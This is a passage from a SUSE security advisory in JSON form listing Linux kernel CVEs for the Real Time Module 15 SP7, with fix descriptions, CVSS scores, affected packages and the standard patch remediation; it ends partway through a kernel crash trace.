"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68768",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68768"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68768",
"url": "https://www.suse.com/security/cve/CVE-2025-68768"
},
{
"category": "external",
"summary": "SUSE Bug 1256579 for CVE-2025-68768",
"url": "https://bugzilla.suse.com/1256579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68768"
},
{
"cve": "CVE-2025-68770",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68770"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbnxt_en: Fix XDP_TX path\n\nFor XDP_TX action in bnxt_rx_xdp(), clearing of the event flags is not\ncorrect. __bnxt_poll_work() -\u003e bnxt_rx_pkt() -\u003e bnxt_rx_xdp() may be\nlooping within NAPI and some event flags may be set in earlier\niterations. In particular, if BNXT_TX_EVENT is set earlier indicating\nsome XDP_TX packets are ready and pending, it will be cleared if it is\nXDP_TX action again. Normally, we will set BNXT_TX_EVENT again when we\nsuccessfully call __bnxt_xmit_xdp(). But if the TX ring has no more\nroom, the flag will not be set. This will cause the TX producer to be\nahead but the driver will not hit the TX doorbell.\n\nFor multi-buf XDP_TX, there is no need to clear the event flags and set\nBNXT_AGG_EVENT. The BNXT_AGG_EVENT flag should have been set earlier in\nbnxt_rx_pkt().\n\nThe visible symptom of this is that the RX ring associated with the\nTX XDP ring will eventually become empty and all packets will be dropped.\nBecause this condition will cause the driver to not refill the RX ring\nseeing that the TX ring has forever pending XDP_TX packets.\n\nThe fix is to only clear BNXT_RX_EVENT when we have successfully\ncalled __bnxt_xmit_xdp().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68770",
"url": "https://www.suse.com/security/cve/CVE-2025-68770"
},
{
"category": "external",
"summary": "SUSE Bug 1256584 for CVE-2025-68770",
"url": "https://bugzilla.suse.com/1256584"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68770"
},
{
"cve": "CVE-2025-68771",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68771"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nocfs2: fix kernel BUG in ocfs2_find_victim_chain\n\nsyzbot reported a kernel BUG in ocfs2_find_victim_chain() because the\n`cl_next_free_rec` field of the allocation chain list (next free slot in\nthe chain list) is 0, triggring the BUG_ON(!cl-\u003ecl_next_free_rec)\ncondition in ocfs2_find_victim_chain() and panicking the kernel.\n\nTo fix this, an if condition is introduced in ocfs2_claim_suballoc_bits(),\njust before calling ocfs2_find_victim_chain(), the code block in it being\nexecuted when either of the following conditions is true:\n\n1. `cl_next_free_rec` is equal to 0, indicating that there are no free\nchains in the allocation chain list\n2. `cl_next_free_rec` is greater than `cl_count` (the total number of\nchains in the allocation chain list)\n\nEither of them being true is indicative of the fact that there are no\nchains left for usage.\n\nThis is addressed using ocfs2_error(), which prints\nthe error log for debugging purposes, rather than panicking the kernel.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68771",
"url": "https://www.suse.com/security/cve/CVE-2025-68771"
},
{
"category": "external",
"summary": "SUSE Bug 1256582 for CVE-2025-68771",
"url": "https://bugzilla.suse.com/1256582"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68771"
},
{
"cve": "CVE-2025-68773",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68773"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: fsl-cpm: Check length parity before switching to 16 bit mode\n\nCommit fc96ec826bce (\"spi: fsl-cpm: Use 16 bit mode for large transfers\nwith even size\") failed to make sure that the size is really even\nbefore switching to 16 bit mode. Until recently the problem went\nunnoticed because kernfs uses a pre-allocated bounce buffer of size\nPAGE_SIZE for reading EEPROM.\n\nBut commit 8ad6249c51d0 (\"eeprom: at25: convert to spi-mem API\")\nintroduced an additional dynamically allocated bounce buffer whose size\nis exactly the size of the transfer, leading to a buffer overrun in\nthe fsl-cpm driver when that size is odd.\n\nAdd the missing length parity verification and remain in 8 bit mode\nwhen the length is not even.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_7_31-rt-1-150700.1.3.2.x86_64",
"SUSE Real Time Module 15 SP7:cluster-md-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:dlm-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:gfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-devel-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-rt-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-rt-devel-6.4.0-150700.7.31.2.x86_64",
"SUSE Real Time Module 15 SP7:kernel-source-rt-6.4.0-150700.7.31.1.noarch",
"SUSE Real Time Module 15 SP7:kernel-syms-rt-6.4.0-150700.7.31.1.x86_64",
"SUSE Real Time Module 15 SP7:ocfs2-kmp-rt-6.4.0-150700.7.31.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-20T10:04:28Z",
"details": "important"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 